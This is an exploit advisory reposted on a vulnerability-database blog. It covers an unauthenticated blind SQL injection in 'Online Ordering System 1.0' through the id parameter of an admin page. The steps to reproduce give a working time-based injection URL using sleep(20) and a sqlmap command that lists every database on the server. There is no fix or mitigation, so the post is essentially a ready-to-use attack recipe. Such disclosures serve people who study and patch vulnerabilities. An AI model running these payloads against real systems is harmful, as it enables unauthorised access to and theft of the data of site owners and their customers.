Wednesday, April 7, 2021

Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u  http://localhost/onlineordering/GPST/admin/design.php?id=9
--batch --dbs

3) Using the above command we will get the name of all the database.

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated